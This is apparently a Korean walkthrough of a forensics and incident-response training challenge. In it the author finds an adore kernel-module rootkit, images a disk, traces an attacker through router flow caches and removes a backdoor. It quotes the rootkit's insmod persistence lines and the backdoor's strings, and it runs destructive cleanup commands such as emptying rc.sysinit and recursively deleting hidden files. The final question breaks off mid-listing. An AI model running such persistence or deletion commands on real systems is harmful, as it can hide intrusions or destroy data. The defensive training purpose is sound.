4 1 0 0 ksoftirqd_CPU0
5 1 0 0 kswapd
6 1 0 0 bdflush
7 1 0 0 kupdated
8 1 0 0 mdrecoveryd
128 1 0 0 kjournald
241 1 1 0 portmap
443 1 0 0 syslogd
448 1 0 0 klogd
551 1 0 0 xinetd
575 1 0 0 sendmail
606 1 1 0 cannaserver
620 1 0 0 crond
641 1 0 0 /sbin/mingetty
642 1 0 0 /sbin/mingetty
643 1 0 0 /sbin/mingetty
644 1 0 0 /sbin/mingetty
645 1 0 0 /sbin/mingetty
646 1 0 0 /sbin/mingetty
649 551 0 0 in.telnetd
650 649 0 0 login
651 650 0 0 -bash
portmap 이라는 프로세스가 루트킷임을 짐작해 볼 수 있습니다.
이제 의심되는 모듈을 로드하는 부분이 어딘지 찾아가보면,
/etc/rc.d
# ls -al
total 485
drwxr-xr-x 2 root other 512 Apr 21 16:46 .
drwxr-xr-x 44 root sys 12800 Apr 21 14:46 ..
-rw------- 1 root other 449392 May 13 2006 core
-rw-r--r-- 1 root other 22556 Apr 21 16:46 rc.sysinit
rc.sysinit의 가장 마지막 줄에
if [ -f /sbin/insmod ] ; then
/sbin/insmod -f /usr/lib/adore.o > /dev/null 2>&1
else
if [ -f /bin/insmod ] ; then
/bin/insmod -f /usr/lib/adore.o > /dev/null 2>&1
fi
fi
윗 부분이 의심 됩니다.
해당 파일들을 모두 지웁니다.
cat /dev/null > rc.sysinit
# rm -rf /usr/lib/adore.o
finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > lkm 모듈이 숨기려고한 프로세스의 이름을 입력하시오.
Answer > portmap
Congratz! You made a success of challenge!
=====================================================
Question 7 - Investigation
=====================================================
# df
/ (/dev/dsk/c1t1d0s0 ): 7779848 blocks 495157 files
/usr (/dev/dsk/c1t1d0s4 ): 3723486 blocks 934936 files
/boot (/dev/dsk/c1t5d0s2 ): 61414 blocks 18991 files
/proc (/proc ): 0 blocks 29926 files
/dev/fd (fd ): 0 blocks 0 files
/etc/mnttab (mnttab ): 0 blocks 0 files
/var (/dev/dsk/c1t1d0s5 ):91428054 blocks 5972251 files
/var/run (swap ):23216992 blocks 440747 files
/tmp (swap ):23216992 blocks 440747 files
/data (/dev/dsk/c1t1d0s6 ): 4408 blocks 18876 files
/home1 (/dev/dsk/c1t2d0s7 ):137973652 blocks 8473929 files
/backup (/dev/dsk/c1t1d0s7 ): 219640 blocks 57019 files
/home3 (/dev/dsk/c1t4d0s7 ):141184988 blocks 8476538 files
/home4 (/dev/dsk/c1t5d0s0 ): 582428 blocks 152061 files
/home (/dev/dsk/c1t5d0s3 ): 2641676 blocks 324324 files
/mnt (/dev/dsk/c1t5d0s7 ):133757598 blocks 8056345 files
dd를 이용해 img로 만듭니다.
cd /home1/user001
# ls -al
total 15999
drwxr-xr-x 2 user001 training 512 Apr 22 19:23 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r-- 1 user001 training 185 Apr 22 19:02 .profile
-rw-r--r-- 1 user001 training 124 Apr 22 19:02 local.cshrc
-rw-r--r-- 1 user001 training 607 Apr 22 19:02 local.login
-rw-r--r-- 1 user001 training 582 Apr 22 19:02 local.profile
-rw-r--r-- 1 root other 726658 Apr 22 19:23 tct-1.12.tar.gz
# dd if=/dev/dsk/c1t1d0s6 of=/home1/user001/backup.img
30528+0 records in
30528+0 records out
# ls -al
total 31271
drwxr-xr-x 2 user001 training 512 Apr 22 19:24 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r-- 1 user001 training 185 Apr 22 19:02 .profile
-rw-r--r-- 1 root other 15630336 Apr 22 19:24 backup.img
-rw-r--r-- 1 user001 training 124 Apr 22 19:02 local.cshrc
-rw-r--r-- 1 user001 training 607 Apr 22 19:02 local.login
-rw-r--r-- 1 user001 training 582 Apr 22 19:02 local.profile
-rw-r--r-- 1 root other 726658 Apr 22 19:23 tct-1.12.tar.gz
tct-1.12.tar.gz의 압축을 풀고 해당 폴더의 bin디렉토리에 들어갑니다.
# ./unrm
../../backup.img > worm.result
명령을 하신 후,
worm.result를 잘 뒤져보면 답을 구할 수 있습니다. -_-
=====================================================
Question 8 - Dos 방어
=====================================================
먼저 라우터들의 IP를 구합니다.
cat /etc/hosts
#
# Internet host table
#
127.0.0.1 localhost
172.16.5.111 zolaris loghost
172.16.5.1 router1
10.10.10.1 router2
10.222.88.144 router3
10.222.88.73 router4
첫번째 라우터부터 차례로 들어가며 명령을 set 해줍니다.
- 첫번째 라우터는 별로 건질게 없는것으로 보입니다.
두번째 라우터 :
Router2# sh ip cache flow | include 5.5
sh command Argument ip cache flow | include 5.5
Se1 5.5.4.1 EI0 172.16.5.111 06 040c 0050 299
Router2# sh ip cef se1
sh command Argument ip cef se1
Prefix Next Hop Interface
10.222.88.128./25 attached Serial0
10.222.88.144/32 10.222.88.144 Ethernet1
10.222.88.73/32 10.222.88.73 Ethernet1
첫번째 시리얼에 5.5를 포함하는 연결이 있음을 알 수 있고,
다음 hop들이 차례로 router3,router4인것을 볼 수 있습니다.
그럼으로 router3,router4에 대한 추가적인 분석이 필요해 보입니다.
세번째 라우터 :
Router3# sh ip cache flow | include 5.5
sh command Argument ip cache flow | include 5.5
Router3#
세번째 라우터에는 연결이 없는것으로 보입니다.
네번쨰 라우터 :
Router4# sh ip cache flow | include 5.5
sh command Argument ip cache flow | include 5.5
Se1 5.5.4.1 EI0 172.16.5.111 06 040c 0050 6673
Router4# sh ip cef se1
sh command Argument ip cef se1
Prefix Next Hop Interface
222.168.97.0/24 attached Serial0
222. .97.2/32 222. .97.2 Ethernet1
Router4#
드디어 라우터의 ip가 아닌 hop을 찾아내었습니다.
해당 주소가 공격자의 ip로 의심됩니다.
# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 공격자의 IP 주소는 무엇인가?
Answer > 222. .97.2
Congratz! You made a success of challenge!
공격자의 접속을 막기위해서 인증전에 다음을 행해 주셔야 합니다. :
conf t
access-list 105 deny ip host 5.5.4.1 any
access-list 105 permit ip any any
exit
w
=====================================================
Question 9 - Investigation
=====================================================
먼저 해당 문제를 시작하기 전에 process list들을 구해둡니다
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cer
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ? 0:00 ipmon -Ds
root 14678 14670 0 22:43:59 pts/2 0:00 ps -ef
root 65 1 0 Apr 20 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 Apr 20 ? 1:37 /usr/lib/picl/picld
root 74 1 0 Apr 20 ? 0:00 devfsadmd
root 185 1 0 Apr 20 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ? 0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ? 0:00 /usr/sbin/nscd
root 431 1 0 Apr 20 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ? 0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/
ib/sf880drd
root 438 1 0 Apr 20 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ? 0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ? 0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ? 0:00 htt_server -port 9010 -syslog -m
ssage_locale C
root 525 1 0 Apr 20 ? 0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ? 0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ? 0:00 /usr/lib/im/htt -port 9010 -sysl
g -message_locale C
root 596 1 0 Apr 20 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/
nmp/conf
root 561 1 0 Apr 20 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ? 0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ? 0:00 /usr/lib/saf/ttymon
root 699 1 0 Apr 20 ? 0:00 /usr/lib/saf/sac -t 300
root 14616 14535 0 22:43:42 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.4
.67
root 14535 418 0 22:42:22 ? 0:00 in.telnetd
root 3374 636 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ? 0:00 /usr/openwin/bin/fbconsole -d :0
root 14670 14663 0 22:43:52 pts/2 0:00 sh
이제 문제를 시작한 후,
리스들을 다시 구해옵니다.
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ? 0:00 ipmon -Ds
root 65 1 0 Apr 20 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 Apr 20 ? 1:37 /usr/lib/picl/picld
root 74 1 0 Apr 20 ? 0:00 devfsadmd
root 185 1 0 Apr 20 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ? 0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ? 0:00 /usr/sbin/nscd
root 431 1 0 Apr 20 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ? 0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 Apr 20 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ? 0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ? 0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 Apr 20 ? 0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ? 0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 596 1 0 Apr 20 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 Apr 20 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ? 0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ? 0:00 /usr/lib/saf/ttymon
root 14727 14670 0 22:44:31 pts/2 0:00 ps -ef
root 699 1 0 Apr 20 ? 0:00 /usr/lib/saf/sac -t 300
root 14723 1 0 22:44:29 ? 0:00 /usr/bin/.
root 14616 14535 0 22:43:42 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 14535 418 0 22:42:22 ? 0:00 in.telnetd
root 3374 636 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ? 0:00 /usr/openwin/bin/fbconsole -d :0
root 14670 14663 0 22:43:52 pts/2 0:00 sh
의심되는 process인 pid 14723을 발견 하였습니다.
# cd /proc/14723/object
# ls -al
total 2540
dr-x------ 2 root other 544 Apr 21 23:01 .
dr-x--x--x 5 root other 736 Apr 21 23:01 ..
-r-xr--r-- 1 root other 125708 Apr 21 23:01 a.out
-r-xr-xr-x 1 root bin 4848 May 6 2006 ufs.118.28.306902
-r-xr-xr-x 1 root bin 5292 May 6 2006 ufs.118.28.343137
-r-xr-xr-x 1 root bin 24968 May 6 2006 ufs.118.28.343169
-r-xr-xr-x 1 root bin 238608 May 6 2006 ufs.118.28.343181
-r-xr-xr-x 1 root bin 70864 May 6 2006 ufs.118.28.343185
-r-xr-xr-x 1 root bin 1158072 May 6 2006 ufs.118.28.343531
-r-xr-xr-x 1 root bin 911328 May 6 2006 ufs.118.28.343533
# strings a.ou
t
backdoor
/etc/.evrc
RC_ROOT
/proc/%ld
%s/%s/pid%d.%s
.cache
restart
%s/%s/pid%d.%s.%s
Command (type 'quit' to quit) :
connection closed by client
Recv
quit
Received Data :
Error : Failed to getting information of CERT-TR environment!
Error : Process is currenlty running..
Accept
Listen
Bind
SetSocketOpt
Socket
/dev/null
Fork
Chdir
Setsid
%s/%s/%s.%d
.cache
udpport
tcpport
내부에 백도어라고 써있는 것을 보아, 대상 프로그램이 맞는것으로 보입니다.
대상 프로세스가 사용하는 파일들을 구합니다.
# /usr/local/bin/lsof -p 14723
lsof: WARNING: bad section count line in /root/.lsof_cert: line "4 sections, dev
=7600000000"
lsof: WARNING: can't unlink /root/.lsof_cert: Permission denied
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
.^T.4 15858 root cwd VDIR 118,24 1024 2 /
.^T.4 15858 root txt VREG 118,28 125708 626207 /usr/bin/.^T.4
.^T.4 15858 root txt VREG 118,28 1158072 343531 /usr/lib/libc.so.1
.^T.4 15858 root txt VREG 118,28 911328 343533 /usr/lib/libnsl.so.
1
.^T.4 15858 root txt VREG 118,28 24968 343169 /usr/lib/libmp.so.2
.^T.4 15858 root txt VREG 118,28 4848 306902 /usr/platform/sun4u
-us3/lib/libc_psr.so.1
.^T.4 15858 root txt VREG 118,28 70864 343185 /usr/lib/libsocket.
so.1
.^T.4 15858 root txt VREG 118,28 5292 343137 /usr/lib/libdl.so.1
.^T.4 15858 root txt VREG 118,28 238608 343181 /usr/lib/ld.so.1
.^T.4 15858 root 0r VCHR 13,2 0t0 30209 /devices/pseudo/mm@
0:null
.^T.4 15858 root 1w VCHR 13,2 0t0 30209 /devices/pseudo/mm@
0:null
.^T.4 15858 root 2w VCHR 13,2 0t0 30209 /devices/pseudo/mm@
0:null
.^T.4 15858 root 3u IPv4 0x3000848b848 0t0 TCP *:42904 (LISTEN)
find 를 이용해 찾아 보면,
# find /usr/bin -name ".*" -exec ls -alQ {} \;
-r-xr-xr-x 1 root other 0 May 24 2005 "/usr/bin/.\024.6"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.3"
-r-xr-xr-x 1 root other 0 May 24 2005 "/usr/bin/.\024.7"
-r-xr-xr-x 1 root other 125708 May 30 2005 "/usr/bin/.\024.99"
-r-xr-xr-x 1 root other 0 May 26 2005 "/usr/bin/.\024.8"
-r-xr-xr-x 1 root other 0 May 26 2005 "/usr/bin/.\024.9"
-r-xr-xr-x 1 root other 0 May 26 2005 "/usr/bin/.\024.10"
-r-xr-xr-x 1 root other 0 May 26 2005 "/usr/bin/.\024.11"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.12"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.13"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.14"
-r-xr-xr-x 1 root other 0 May 27 2005 "/usr/bin/.\024.15"
-r-xr-xr-x 1 root other 0 May 27 2005 "/usr/bin/.\024.16"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.17"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.24"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.27"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.28"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.29"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.32"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.33"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.36"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.37"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.38"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.39"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.40"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.41"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.42"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.43"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.44"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.45"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.46"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.47"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.48"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.49"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.50"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.51"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.52"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.53"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.54"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.55"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.56"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.57"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.58"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.59"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.60"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.61"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.62"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.63"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.64"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.65"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.66"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.67"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.68"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.69"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.70"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.71"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.72"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.73"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.74"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.75"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.76"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.77"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.78"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.79"
-r-xr-xr-x 1 root other 0 May 12 2005
"/usr/bin/.\024.80"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.81"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.82"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.83"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.84"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.85"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.86"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.87"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.88"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.89"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.90"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.91"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.92"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.93"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.94"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.95"
-r-xr-xr-x 1 root other 125708 May 30 2005 "/usr/bin/.\024.96"
-r-xr-xr-x 1 root other 125708 May 30 2005 "/usr/bin/.\024.97"
-r-xr-xr-x 1 root other 125708 May 30 2005 "/usr/bin/.\024.98"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.100"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.101"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.102"
-r-xr-xr-x 1 root other 0 May 12 2005 "/usr/bin/.\024.103"
좀 많습니다.
#find /usr/bin -name ".*" -exec rm -rf {} \;
#
finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!
통과 됬네요.
=====================================================
Question 10 - 조사단계
=====================================================
before :
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ? 0:00 ipmon -Ds
root 65 1 0 Apr 20 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 Apr 20 ? 1:43 /usr/lib/picl/picld
root 74 1 0 Apr 20 ? 0:00 devfsadmd
root 185 1 0 Apr 20 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ? 0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ? 0:01 /usr/sbin/nscd
root 431 1 0 Apr 20 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ? 0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 Apr 20 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ? 0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ? 0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 Apr 20 ? 0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ? 0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 24707 24699 0 00:16:01 pts/2 0:00 sh
root 596 1 0 Apr 20 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 Apr 20 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ? 0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ? 0:00 /usr/lib/saf/ttymon
root 22175 22094 0 23:40:49 pts/3 0:00 login -p -d /dev/pts/3 -h 210.99.
66.1
root 699 1 0 Apr 20 ? 0:00 /usr/lib/saf/sac -t 300
root 22094 418 0 23:39:29 ? 0:00 in.telnetd
root 24663 24569 0 00:15:48 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 24569 418 0 00:14:28 ? 0:00 in.telnetd
root 3374 636 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ? 0:00 /usr/openwin/bin/fbconsole -d :0
root 24719 24707 0 00:16:11 pts/2 0:00 ps -ef
after :
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ? 0:00 ipmon -Ds
root 65 1 0 Apr 20 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 Apr 20 ? 1:43 /usr/lib/picl/picld
root 74 1 0 Apr 20 ? 0:00 devfsadmd
root 185 1 0 Apr 20 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ? 0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ? 0:01 /usr/sbin/nscd
root 431 1 0 Apr 20 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ? 0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 Apr 20 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ? 0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ? 0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 Apr 20 ? 0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ? 0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 24707 24699 0 00:16:01 pts/2 0:00 sh
root 596 1 0 Apr 20 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 Apr 20 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ? 0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ? 0:00 /usr/lib/saf/ttymon
root 22175 22094 0 23:40:49 pts/3 0:00 login -p -d /dev/pts/3 -h 210.99.
66.1
root 699 1 0 Apr 20 ? 0:00 /usr/lib/saf/sac -t 300
root 22094 418 0 23:39:29 ? 0:00 in.telnetd
root 24663 24569 0 00:15:48 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 24569 418 0 00:14:28 ? 0:00 in.telnetd
root 3374 636 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ? 0:00 /usr/openwin/bin/fbconsole -d :0
root 24719 24707 0 00:16:11 pts/2 0:00 ps -ef
# challenge 10
Now, You are challenging question 10.
Good Luck!
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ? 0:00 ipmon -Ds
root 65 1 0 Apr 20 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 Apr 20 ? 1:43 /usr/lib/picl/picld
root 74 1 0 Apr 20 ? 0:00 devfsadmd
root 185 1 0 Apr 20 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ? 0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ? 0:01 /usr/sbin/nscd
root 431 1 0 Apr 20 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ? 0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 Apr 20 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ? 0:00 /usr/lib/power/powerd
